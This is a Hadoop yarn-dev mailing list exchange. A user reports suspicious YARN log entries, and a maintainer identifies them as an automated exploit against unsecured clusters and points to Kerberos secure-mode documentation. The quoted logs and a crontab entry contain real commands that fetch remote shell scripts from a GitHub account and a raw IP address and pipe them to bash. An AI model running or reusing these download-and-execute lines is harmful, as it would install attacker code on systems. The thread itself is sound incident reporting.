Hi Cliff! That looks like the result of an automated scan + exploit tool. Presuming your cluster is not using kerberos and is accessible from the outside world it's only a matter of time before malicious users submit jobs like this.
Please see the following guide on securing your Hadoop cluster: http://hadoop.apache.org/docs/r2.7.6/hadoop-project-dist/hadoop-common/SecureMode.html The PMC has notified GitHub about the malicious user account and they are looking to shut it down. Additionally, we encourage folks to subscribe to common-...@hadoop.apache.org and participate in a discussion on better securing things by default: Subject: [DISCUSS]: securing ASF Hadoop releases out of the box https://s.apache.org/5GeN Thanks for notifying us about this activity! -busbey On 2018/07/03 13:56:28, Cliff Mattern <clifford.matt...@alphacarina.de> wrote: > Dear all, > > we downloaded > http://www.apache.org/dyn/closer.cgi/hadoop/common/hadoop-2.7.6/hadoop-2.7.6.tar.gz > > and install the unpacked files as described. The md5 check was correct. > After few days we found in the log files of YARN following entries: > > 2018-06-29 05:37:21,490 INFO > org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: > Command to launch container container_1530169168373_1580_01_000001 : > wget -q -O - > https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash ... > 2018-06-29 05:39:54,152 INFO > org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: > Command to launch container container_1530169168373_1583_01_000001 : > wget -q -O - > https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash & > disown In the crontab we found following single entry: * * * * * wget -q > -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1 > > We installed hadoop 2.7.6 on two seperate machines and get the same > behaviour. This all looks like a trojaner is working. What do you say to > this issue? > > Mit freundlichen Grüßen / Kind regards, > Cliff Mattern > > -- > Clifford Mattern > AlphaCarina Software GmbH > Taunusturm 18.OG > Taunustor 1 > 60310 Frankfurt am Main > > Tel.: +49 (0)69 24 43 42-4395 > Fax: +49 (0)69 24 43 42-4150 > > e-Mail:clifford.matt...@alphacarina.de > Internet:https://alphacarina.de/ > > HRB Nr. 2339 • Handelsregister Deggendorf > Geschäftsführer: Dipl.-Inf. Stephan Iglhaut > > --------------------------------------------------------------------- To unsubscribe, e-mail: yarn-dev-unsubscr...@hadoop.apache.org For additional commands, e-mail: yarn-dev-h...@hadoop.apache.org
